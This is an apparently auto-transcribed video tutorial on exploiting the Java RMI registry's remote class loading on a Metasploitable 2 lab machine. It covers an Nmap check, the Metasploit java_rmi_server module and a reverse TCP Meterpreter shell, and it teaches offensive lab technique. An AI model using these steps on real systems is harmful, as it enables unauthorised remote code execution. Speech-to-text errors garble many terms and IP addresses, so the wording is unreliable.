Hey guys. So in this video, I want to show you guys how you can exploit Java RMI surveys with Metasploit Framework. Java RMI stands for remote method invocation or just Java on my plane. It's a mechanism that allows an object that exists in one Java Virtual Machine to access and call methods that are contained in another Java Virtual Machine. So basically, it's the same thing as an RPC, but in an injected object oriented paradigm, and sort of a procedural one. So this allows for communication between Java programs that are not in the same address space.

So this vulnerability is due to the default configuration of the Rmi registry and RM activation services allowing the loading of classes from a remote URL so that that's what it does, it allows TAs are getting loaded from a remote URL. And this we can take advantage of this and exploit it So this protocol Rmi protocol uses makes use of two other protocols. For its on the wire format is Java object serialization and HTTP. The object serialization protocol is used to marshal call and return data. But the other one they should be protocol is used to only post a remote method invocation and often return data when circumstances weren't. So first, we need to see if it exists if the target is vulnerable to this particular exploit because we want to check for that port.

So let's do an Nmap scan on over target machine. And even for this video, I'm going to be using now splittable to which I actually have it open from my VirtualBox right here. I just opened it up and just look for the IP here, just type ipconfig and you've seen the IP so let's go So let's go back. Let's go back to our Kali machine. And now type that 921600 which is our meta splittable to IP address answer. And now let's see if our registry Rmi registry port is open and not.

So as you can see, these are like all the ones that are open right now. And it's right here our Rmi registry is open which is 1099. For our next step is you we got up we got to figure out what you can do you can use and map spread and verify if this if this particular machine is vulnerable or not, this particular IP address is vulnerable to Rmi registry or not. So all you got to do is you can use an end map script engine so Zoho it goes you can just type in map and then Script dash desperate. And then Rmi on my wall, because that's what we're looking for in class loader. Dash V, we're going to be talking the port which is 1099.

That's where Rmi registry is. And then our IP address, which is our meta splittable to IP address is 01 95. And enter. Looks like it's down. I think the IPS change. Let's try it again.

Yes, this one I do it. So let's go back to a virtual machine and type that in 190. Awesome. So our target is vulnerable Rmi registry default combination makes remote code execution possible. So now, our next step. is to see as you open up MSF console, because we're gonna be using the Ross Boyd framework for this.

So open that up and look for this particular exploit which is Java RMI exploit. I'm just going to type search Java RMI awesome. So yeah, we got a lot of exploitable we got three four exploits. And I'm going to be picking this one right here. So just copy that and type use paste. Now let's look for the options we need to set.

And that's it. So we need to set our remote hosts which is our meta splittable to machine so our hosts 1921680 198. Now we already have our new check in show options to see so our party said or Center. They need anything all right now. Okay, awesome. Our next step is to just see if it runs.

Let's run and see if it's working. Great. So, as you can see the loader is interval enabled in the execution was completed. Our next step is exploitation phase. For this, we can see that the scanner detected a Java Java RMI port in point on port 1099 right here, right, would suggest that the target may be vulnerable. Now it's time to explore the same set service with the poet with this particular module.

Multi or was it right here, multi copy that and now choose it over here and paste because the first one was an officer right level now we're trying to actually act Point, answer. Great. Now, let's look at the options. So we have our arm also is not set. So let's set that up, set our hose 1921680 190, enter. Great.

So now we have Okay, we also have our for this module, Java RMI server, it takes advantage of the default configuration of the army registry and the activation services. So this allows us like I was mentioning earlier, this allows us to load classes from any remote URL, an HTTP URL, because it invokes a method in the Rmi registry, just some from the garbage collector, which is available via like any Rmi endpoint. And this can be used against both Rmi registry and RM IR an ID also against most other custom made Rmi endpoints as well. One thing though, it doesn't work against Java management extension course, since those do not support remote cause loading, unless another Rmi endpoint is active in the same Java process as the only time that it is possible. And our method calls do not support or require any sort of authentication either.

Alright, so let's now let's go back and see so we have our our host set our port set to add, our next step is to set a payload so that we can have a connection back and I want to go for something a reverse TCP shell connection, you can just type show payload. And like I said, I'm looking for something like a reverse TCP shell connection. So I want to go for and that can give me a metaphor to show them So I'm going to go over some TCP connection back for that can give me that upper shell. So this looks good. Let's copy that. And set the payload, set payload and paste it.

Answer. Awesome. Now let's again look for the options and see what options we need to set. So we see our Aravosis set perfect. There to set up our localhost though, let's go to let's open up another tab and type ipconfig again to see what has ever called Linux IP, which is 197. So set L ellos.

1921680197. Enter. Well, let's look at the options again, show options. Awesome. Our l host is set. So our host is set on the poor out pour, pour, pour, pour, pour.

And now we gotta run this exclusive So just type run and see if it works if America shows awesome so we got our meterpreter shell open all you got to do to set the session as you get to like we can see that the exploit started a handler on our system and you can see a hammer has been started and then it sends the Rmi method call to the target right here. And that emitters pretty shell down and open. Now if you type sessions, gosh, I got your shows all the sessions that are open. So we got two sessions open. That's awesome. You can use either one to access a meterpreter shell because both are Metacritic shells.

So I'm going to go type sessions and dash I which has got which will tell me what I need and then I'm going to type two because matter for Shell two is open, right? So I'm just going to go for two and enter. Great. There you go. There's our meta version. And as I mentioned before, meta operator is a very powerful shell.

It'll give you scope to a lot of exploits and a lot of vulnerability tools. You can check by typing sis info to see what the information is about your system. There you go. It is metals portable. That's our training machine. That's it guys.

I hope you enjoyed this video. We'll see in the next one.